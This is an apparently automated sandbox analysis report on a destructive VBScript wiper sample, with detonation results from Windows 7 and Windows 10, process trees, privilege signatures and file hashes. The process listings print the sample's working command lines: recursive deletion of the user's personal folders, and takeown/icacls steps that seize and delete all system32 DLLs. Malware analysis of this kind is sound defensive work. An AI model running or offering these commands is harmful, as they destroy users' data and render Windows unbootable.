Malware Analysis Report

2024-11-16 12:50

Sample ID 240809-zxrwaaygmn
Target file.vbs
SHA256 6d811ce895dd0383e794cef00804d44104196fb5bd263305fb3f10be77f24711
Tags
discovery exploit persistence privilege_escalation
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

6d811ce895dd0383e794cef00804d44104196fb5bd263305fb3f10be77f24711

Threat Level: Likely malicious

The file file.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit persistence privilege_escalation

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 21:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 21:06

Reported

2024-08-09 21:07

Platform

win7-20240704-en

Max time kernel

44s

Max time network

18s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 548 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 2296 wrote to memory of 548 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 2296 wrote to memory of 548 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 2296 wrote to memory of 2216 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2216 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2216 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2132 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2132 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2132 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2132 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k rd /s /q C:\Users\Admin\desktop >nul && rd /s /q C:\Users\Admin\downloads >nul && rd /s /q C:\Users\Admin\documents >nul && rd /s /q C:\Users\Admin\pictures >nul && rd /s /q C:\Users\Admin\music >nul && rd /s /q C:\Users\Admin\videos >nul && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\*.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\*.dll /grant Everyone:(F)

C:\Program Files\Windows Sidebar\sidebar.exe

"C:\Program Files\Windows Sidebar\sidebar.exe" /showGadgets

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe"

C:\Windows\system32\magnify.exe

"C:\Windows\system32\magnify.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs

MD5 f552e24893f6d17cbf9ec48b8dc95bf6
SHA1 141081a16db1c097d7d377f1cd3d2e3b0c85e18b
SHA256 98e5aa2e5b1d25eb95b305bd6ab2f0c7277a563791799bad5a00316acc68fd28
SHA512 1008ead20f91fbd84e1a2dd665be008a3aa70b853b38599a308853ac8fd8e15b619e4d16ef4cef54f8c087b8c48a658c82c88d30171d6eb1991049ad8f259063

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-09 21:06

Reported

2024-08-09 21:07

Platform

win10v2004-20240802-en

Max time kernel

52s

Max time network

55s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\System32\WScript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5024 wrote to memory of 2584 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 5024 wrote to memory of 2584 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 5024 wrote to memory of 3660 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5024 wrote to memory of 3660 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5024 wrote to memory of 824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5024 wrote to memory of 824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 824 wrote to memory of 4968 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 824 wrote to memory of 4968 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 824 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 824 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k rd /s /q C:\Users\Admin\desktop >nul && rd /s /q C:\Users\Admin\downloads >nul && rd /s /q C:\Users\Admin\documents >nul && rd /s /q C:\Users\Admin\pictures >nul && rd /s /q C:\Users\Admin\music >nul && rd /s /q C:\Users\Admin\videos >nul && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\*.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\*.dll /grant Everyone:(F)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=1436 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 204.79.197.203:443 tcp

Files

C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs

MD5 f552e24893f6d17cbf9ec48b8dc95bf6
SHA1 141081a16db1c097d7d377f1cd3d2e3b0c85e18b
SHA256 98e5aa2e5b1d25eb95b305bd6ab2f0c7277a563791799bad5a00316acc68fd28
SHA512 1008ead20f91fbd84e1a2dd665be008a3aa70b853b38599a308853ac8fd8e15b619e4d16ef4cef54f8c087b8c48a658c82c88d30171d6eb1991049ad8f259063